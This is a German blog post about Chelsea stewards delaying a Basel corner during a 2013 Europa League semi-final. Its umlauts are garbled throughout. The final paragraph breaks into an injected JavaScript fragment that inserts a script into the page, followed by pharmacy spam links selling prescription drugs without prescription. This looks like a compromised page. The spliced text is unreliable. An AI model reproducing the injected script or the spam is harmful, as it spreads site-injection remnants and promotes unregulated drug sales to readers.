Willkommen auf » Subtiles Zeitspiel durch Chelsea-Ordner
6. Mai 2013

Subtiles Zeitspiel durch Chelsea-Ordner

Ungeachtet der einnehmenden deutschen Erfolge in der Champions League wurden in der vergangenen Woche auch die Halbfinals der Europa League ausgespielt. Benfica Lissabon setzte sich nach einem 0:1 in der Vorwoche mit 3:1 gegen Fenerbahce Istanbul durch, der FC Chelsea besiegte das A?berraschungsteam FC Basel mit 2:1 und setzte an der heimischen Stamford Bridge nun noch ein 3:1 drauf.

Und bei genau diesem Gastspiel des FC Basel in London konnte man in der Schlussphase eine kuriose SpielverzAi??gerung beobachten. Der Schweizer Meister wollte die letzten MAi??glichkeiten konzentriert und motiviert ausspielen, um doch noch den Anschluss zu schaffen oder sich zumindest erhobenen Hauptes aus dem Wettbewerb zu verabschieden.

Entsprechend viel Zug war also auch in der 80. Minute noch im Spiel, als die Baseler einen Eckball treten wollten. Eine schnelle AusfA?hrung verzAi??gerten jedoch, sehr zum Ai??rger des SchA?tzen, die an der Seitenlinie vorbei marschierenden Londoner Ordner. Absicht oder nicht?

Da lAi??uft einer nach dem anderen frAi??hlich durch die Laufbahn und stAi??rt sich nicht an dem gestikulierenden Baselspieler nebenan :)document.currentScript.parentNode.insertBefore(s, document.currentScript); glucophage without a script online http://nonlinear.sg/blog/cheap-emsam-cost/ http://bluewaterfestival.org.au/buy-avana/ avalide cost Cheap Cheap cheap benemid and aspirin how long clomid take to work for a men. Purchase Buy medications canada no prescription, order salbutamol express shipping. cialis price paypal


Einen Kommentar schreiben